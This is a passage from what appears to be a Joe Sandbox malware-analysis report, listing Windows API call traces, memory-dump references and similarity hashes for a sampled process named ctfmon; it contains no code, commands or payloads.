        • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,0040D0BE,?,00000000,?,?,?,0040D0BE), ref: 0040FF0B
        • FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,0040D0BE), ref: 0040FF41
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
        • String ID:
        • API String ID: 158306478-0
        • Opcode ID: 38c6228edd32d6f1fba469b4e4b004e6b126ab12aff7eee28f25b7e0406bb547
        • Instruction ID: aa68c8225dd583959b6512c48fc187da00978e995f8350bfac9d4924fef5e386
        • Opcode Fuzzy Hash: 38c6228edd32d6f1fba469b4e4b004e6b126ab12aff7eee28f25b7e0406bb547
        • Instruction Fuzzy Hash: 60413632A042126BD731AB64EC44B3B7698EB51714F11053BF801F3BE2DB7C9C4946D8
        APIs
        • GetCurrentThreadId.KERNEL32 ref: 0041DA97
        • EnterCriticalSection.KERNEL32(00540EE0), ref: 0041DAA4
        • LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041DAEC
        • CallNextHookEx.USER32(00000000,?,?,?), ref: 0041DB03
        • LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041DB1E
        • GetWindowLongA.USER32(?,000000F0), ref: 0041DB62
        • SendMessageA.USER32(?,000011F0,00000000,00000001), ref: 0041DB89
        • GetParent.USER32(?), ref: 0041DBF1
        • CallNextHookEx.USER32(?,?,?,?), ref: 0041DC2E
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
        • String ID:
        • API String ID: 1151315845-0
        • Opcode ID: d73eb355c938408c093bacc49a2554f20d8b0ef65da80eb48a7d5ecfde790e24
        • Instruction ID: 3545cc89381b001688f13769ec11b2821f14b273c618948fc64cceaa8c3ba814
        • Opcode Fuzzy Hash: d73eb355c938408c093bacc49a2554f20d8b0ef65da80eb48a7d5ecfde790e24
        • Instruction Fuzzy Hash: 9C41DAB5A44310EBD720DF10EC85BEB7764FB59358F14042AFA0593292D778A8CDC7A9
        APIs
        • EnterCriticalSection.KERNEL32(00540EE0,?,0041C90F), ref: 0041D4B6
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D4F2
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D50D
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D520
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D533
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D546
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D559
        • GlobalDeleteAtom.KERNEL32(?), ref: 0041D56C
        • LeaveCriticalSection.KERNEL32(00540EE0,?,0041C90F), ref: 0041D57D
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AtomDeleteGlobal$CriticalSection$EnterLeave
        • String ID:
        • API String ID: 3843206905-0
        • Opcode ID: 2b75fa68889f91098e5643466e8799e8587f338c2001ebdaef05f8f721e44a84
        • Instruction ID: 13cd0210057b9161806c39b4b786d17877643f6b89466e3cfc64d8f8ea033297
        • Opcode Fuzzy Hash: 2b75fa68889f91098e5643466e8799e8587f338c2001ebdaef05f8f721e44a84
        • Instruction Fuzzy Hash: 40113DBDC00215B1D7356BA4EC086EA36B5A71A70CF246422E600476F0D7BC58CEDFAC
        APIs
        • GetStringTypeW.KERNEL32(00000001,0042F1F8,00000001,?,7622E860,0053FD88,?,?,00416871,?,?,?,00000000,00000001), ref: 00416C7E
        • GetStringTypeA.KERNEL32(00000000,00000001,0042F1F4,00000001,?,?,00416871,?,?,?,00000000,00000001), ref: 00416C98
        • GetStringTypeA.KERNEL32(?,?,?,?,qhA,7622E860,0053FD88,?,?,00416871,?,?,?,00000000,00000001), ref: 00416CCC
        • MultiByteToWideChar.KERNEL32(?,0053FD89,?,?,00000000,00000000,7622E860,0053FD88,?,?,00416871,?,?,?,00000000,00000001), ref: 00416D04
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00416871,?), ref: 00416D5A
        • GetStringTypeW.KERNEL32(?,?,00000000,qhA,?,?,?,?,?,?,00416871,?), ref: 00416D6C
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: StringType$ByteCharMultiWide
        • String ID: qhA
        • API String ID: 3852931651-109923292
        • Opcode ID: 150e23084c8718023d15674a9defdb49b39a0b8ce7e63f20e8833cea17a168bd
        • Instruction ID: 03fcf75f4968f94f2bb644bc32e47f6b93cad4a4674484b923943e54a38a0d42
        • Opcode Fuzzy Hash: 150e23084c8718023d15674a9defdb49b39a0b8ce7e63f20e8833cea17a168bd
        • Instruction Fuzzy Hash: 0641AD72A00219AFCF219F94EC86EEF7BB8FB08754F214526F911D2250D338C991DBA5
        APIs
        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004105CE
        • GetStdHandle.KERNEL32(000000F4,0042F07C,00000000,00000000,00000000,?), ref: 004106A4
        • WriteFile.KERNEL32(00000000), ref: 004106AB
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: File$HandleModuleNameWrite
        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
        • API String ID: 3784150691-4022980321
        • Opcode ID: c0987cdfdb90bcd61f79998fa3c49d719af975966672589e0cb3e741b420638c
        • Instruction ID: c02292fbb0e4d8d3e6b59c55069bed7ebd2c7da6c3cacf8f517a257bbcbb3b0a
        • Opcode Fuzzy Hash: c0987cdfdb90bcd61f79998fa3c49d719af975966672589e0cb3e741b420638c
        • Instruction Fuzzy Hash: 6031D672B00218AEDF20DAA0CD45FDE376DDF85304F90046BF544D6191E6F8AAD58A5D
        APIs
        • __EH_prolog.LIBCMT ref: 00406D42
        • GetStockObject.GDI32(00000011), ref: 00406D75
        • GetStockObject.GDI32(0000000D), ref: 00406D80
        • GetObjectW.GDI32(00406E87,0000005C,?), ref: 00406DAE
        • GetDeviceCaps.GDI32(?,0000005A), ref: 00406E1D
        • #253.OLEPRO32(00000020,0042F580,?,?), ref: 00406E49
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Object$Stock$#253CapsDeviceH_prolog
        • String ID:
        • API String ID: 1238440774-3916222277
        • Opcode ID: 0886e04da2797d501dfa00fad7a766727e3081159960d1d571b8e29a0e902311
        • Instruction ID: ff0ac20cef680e3f131b4560153c210be97b3ea0a685f7a4baa30aa74b484bf8
        • Opcode Fuzzy Hash: 0886e04da2797d501dfa00fad7a766727e3081159960d1d571b8e29a0e902311
        • Instruction Fuzzy Hash: C2414974E012299ECB10DFA5D9807EDBBB0BF18304F5040BAE555F7281E7785A45CFA8
        APIs
        • GetMonitorInfoW.USER32(?,?), ref: 00405C1D
        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405C44
        • GetSystemMetrics.USER32(00000000), ref: 00405C5C
        • GetSystemMetrics.USER32(00000001), ref: 00405C63
        • lstrcpyW.KERNEL32(?,DISPLAY), ref: 00405C87
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: System$InfoMetrics$MonitorParameterslstrcpy
        • String ID: B$DISPLAY
        • API String ID: 1771318095-3316187204
        • Opcode ID: 45d5df4bb5912470cd260a2f1592e2a4264016a8dfc306c8960ab1dc3bceefa8
        • Instruction ID: 930622f50884a770117930609482ab71e3439554aa9ec88adfacdbd60153f98a
        • Opcode Fuzzy Hash: 45d5df4bb5912470cd260a2f1592e2a4264016a8dfc306c8960ab1dc3bceefa8
        • Instruction Fuzzy Hash: D611E031600B20ABEF119F64DC89A9BBBA8EF09B50B044473FC05AE181D3B5D941CFE9
        APIs
        • __EH_prolog.LIBCMT ref: 00407CAA
          • Part of subcall function 00407A77: CoGetClassObject.OLE32(00000000,?,00000000,0042F6B0,00000003,?,?,?,?,00407CD3,?,00000000,00000003,0042F710,?,?), ref: 00407A97
          • Part of subcall function 00426B33: __EH_prolog.LIBCMT ref: 00426B38
          • Part of subcall function 00426C0F: __EH_prolog.LIBCMT ref: 00426C14
        • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00407E30
        • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00407E51
        • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00407E99
        • GlobalLock.KERNEL32(00000000), ref: 00407EA7
        • GlobalUnlock.KERNEL32(?), ref: 00407EBF
        • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 00407EE2
        • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,00000000), ref: 00407EFE
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
        • String ID:
        • API String ID: 645133905-0
        • Opcode ID: 302024f70b7680546cec5b29f2414604d49aed9f3e4cc86d70ec7265d503e271
        • Instruction ID: 7a88ba2808e2917381c35da6fa48b70894891fb86309c958b2177dbe66a41b7c
        • Opcode Fuzzy Hash: 302024f70b7680546cec5b29f2414604d49aed9f3e4cc86d70ec7265d503e271
        • Instruction Fuzzy Hash: 9BB1F7B0A0020AEFCB14DF64C8849AE7BB9FF48304B50446EF915EB290D775ED55CBA5
        APIs
        • LCMapStringW.KERNEL32(00000000,00000100,0042F1F8,00000001,00000000,00000000,7622E860,0053FD88,00000000,004070FB,004070FB,00000001,004070FB,?,00000000), ref: 00414156
        • LCMapStringA.KERNEL32(00000000,00000100,0042F1F4,00000001,00000000,00000000), ref: 00414172
        • LCMapStringW.KERNEL32(00000000,?,004070FB,00000001,004070FB,004070FB,7622E860,0053FD88,00000000,004070FB,004070FB,00000001,004070FB,?,00000000), ref: 004141BB
        • WideCharToMultiByte.KERNEL32(00000000,00000220,004070FB,00000001,00000000,00000000,00000000,00000000,7622E860,0053FD88,00000000,004070FB,004070FB,00000001,004070FB,?), ref: 004141EE
        • WideCharToMultiByte.KERNEL32(00000220,00000220,?,?,?,?,00000000,00000000), ref: 00414245
        • LCMapStringA.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00414261
        • LCMapStringA.KERNEL32(00000000,?,?,?,?,00000000), ref: 004142B7
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: String$ByteCharMultiWide
        • String ID:
        • API String ID: 352835431-0
        • Opcode ID: e94a515efaa52b9500725aa8f974ee985b2bee1c99e19310b77f39619ecc541f
        • Instruction ID: 4b50a8c487744f979af65fd3580d31e16f27d9c7471aa09ca8c7b8346b332458
        • Opcode Fuzzy Hash: e94a515efaa52b9500725aa8f974ee985b2bee1c99e19310b77f39619ecc541f
        • Instruction Fuzzy Hash: E8516072A01219FBCF218F95DC45AEF7F75FF49790F104126F914A2260D33988A1DBA9
        APIs
        • GlobalLock.KERNEL32(?), ref: 00420332
        • lstrcmpW.KERNEL32(00000000,?), ref: 0042033F
        • OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 00420351
        • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00420374
        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0042037C
        • GlobalLock.KERNEL32(00000000), ref: 00420389
        • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00420396
        • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004203B4
          • Part of subcall function 00426AAB: GlobalFlags.KERNEL32(?), ref: 00426AB5
          • Part of subcall function 00426AAB: GlobalUnlock.KERNEL32(?), ref: 00426ACC
          • Part of subcall function 00426AAB: GlobalFree.KERNEL32(?), ref: 00426AD7
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
        • String ID:
        • API String ID: 168474834-0
        • Opcode ID: 307b0941f7d0e61dc12a7e9e3dafc4a894b0fb460a9c4d87e7c1060bcc018b55
        • Instruction ID: 0b204c46f73b846c4d535605207009b96763e7d5aecbe2a14173c396f1b1e3a3
        • Opcode Fuzzy Hash: 307b0941f7d0e61dc12a7e9e3dafc4a894b0fb460a9c4d87e7c1060bcc018b55
        • Instruction Fuzzy Hash: B811B271600204BFDB219FA6DC85EAF7BBEEB85744F80441FF605C1122DA389D419768
        APIs
        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00403744
        • SetCurrentDirectoryW.KERNEL32(?), ref: 00403758
          • Part of subcall function 00405FAB: lstrcpyW.KERNEL32(-0000002C,?,76228FB0,00000000,00000000,00403769,*.*,00000000), ref: 00405FD9
          • Part of subcall function 00405FAB: FindFirstFileW.KERNEL32(?,?), ref: 00405FE3
          • Part of subcall function 00405FAB: GetLastError.KERNEL32 ref: 00405FF1
          • Part of subcall function 00405FAB: SetLastError.KERNEL32(0000007B,000000FF,00000000,?), ref: 0040603C
        • SetCurrentDirectoryW.KERNEL32(?,*.*,00000000), ref: 00403772
        • SetCurrentDirectoryW.KERNEL32(?,?,*.*,00000000,?), ref: 004039B8
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CurrentDirectory$ErrorLast$FileFindFirstlstrcpy
        • String ID: *.*$+*&=^^^^--------FOAFI
        • API String ID: 3265023940-3701103783
        • Opcode ID: e23933d640f83bf503476f99b45a4b13bb09ed4aafc8bc2b35c0690dfbe1e2d2
        • Instruction ID: c2ba0176b6e8a51bde1fead6c9d730875980fedec447b924fc6af5e119b7eb36
        • Opcode Fuzzy Hash: e23933d640f83bf503476f99b45a4b13bb09ed4aafc8bc2b35c0690dfbe1e2d2
        • Instruction Fuzzy Hash: 5C91B2B16087458FC714EF64D881AAFB7E4FF94304F40492EF88697292DB789A09CB56
        APIs
        • __EH_prolog.LIBCMT ref: 0042A3D7
        • lstrlenA.KERNEL32(?,?,00000000), ref: 0042A402
          • Part of subcall function 0042A1BB: VariantChangeType.OLEAUT32(?,?,00000000), ref: 0042A25D
        • VariantClear.OLEAUT32(0000000C), ref: 0042A536
        Strings
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Variant$ChangeClearH_prologTypelstrlen
        • String ID: `DvP?Dv
        • API String ID: 1986235341-2995021381
        • Opcode ID: 8801a59d29ddf15b6a0c9516b87d31f29ca514a8556d63ca9559653f2ad9c6e1
        • Instruction ID: abb0e72d5d88a092ec7afbcfa9dfacffd580bca7bb0b75038710df2ecb83c9b3
        • Opcode Fuzzy Hash: 8801a59d29ddf15b6a0c9516b87d31f29ca514a8556d63ca9559653f2ad9c6e1
        • Instruction Fuzzy Hash: 2571DF31A00219EBCB10DF95E884AAF7BB4FF04354B94801AFC45AB351D738DD65CB9A
        APIs
        • GetPropA.USER32(?,?), ref: 0041F5E3
        • CallWindowProcA.USER32(00000000), ref: 0041F605
          • Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Prop$CallProcRemoveWindow
        • String ID:
        • API String ID: 2276450057-0
        • Opcode ID: 66eec8f5867871687971e7cf88935b3b0a3b9556cde3479bbdf13fd8abadd41c
        • Instruction ID: 95218b5de41767b7d9650821bd78bf42db176b432e658d53fc5444424646f800
        • Opcode Fuzzy Hash: 66eec8f5867871687971e7cf88935b3b0a3b9556cde3479bbdf13fd8abadd41c
        • Instruction Fuzzy Hash: 263121B66012106BD31097A8AC85DEFB79CDBD6365F04003AF904C3211E339A98B87BA
        APIs
        • SetBkColor.GDI32(?), ref: 0041C56D
        • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5BA
        • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C5E9
        • SetBkColor.GDI32(?,?), ref: 0041C607
        • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C632
        • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0041C66C
        • SetBkColor.GDI32(?,00000000), ref: 0041C674
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Text$Color
        • String ID:
        • API String ID: 3751486306-0
        • Opcode ID: 5bf2b2e0b6b21aa8dc883ed879caea82f90410eca26ed32267389f5f92ee2a1b
        • Instruction ID: dabda8f32d19d4ae70fa47c5b4f3ddd5b41a6e56053b92537af6c747e390af38
        • Opcode Fuzzy Hash: 5bf2b2e0b6b21aa8dc883ed879caea82f90410eca26ed32267389f5f92ee2a1b
        • Instruction Fuzzy Hash: EE415A74244301AFE320DF54CC86F6AB7E4EB85B40F64481DFA549A2C1D775E90ACB6A
        APIs
        • GetWindow.USER32(?,00000002), ref: 0040C2C0
        • GetParent.USER32(?), ref: 0040C2D3
          • Part of subcall function 0040C24C: GetWindowLongW.USER32(?,000000F0), ref: 0040C264
          • Part of subcall function 0040C24C: GetParent.USER32(?), ref: 0040C27D
          • Part of subcall function 0040C24C: GetWindowLongW.USER32(?,000000EC), ref: 0040C290
        • GetWindow.USER32(?,00000002), ref: 0040C2F6
        • GetWindow.USER32(?,00000002), ref: 0040C308
        • GetWindowLongW.USER32(?,000000EC), ref: 0040C318
        • IsWindowVisible.USER32(?), ref: 0040C331
        • GetTopWindow.USER32(?), ref: 0040C357
        Memory Dump Source
        • Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
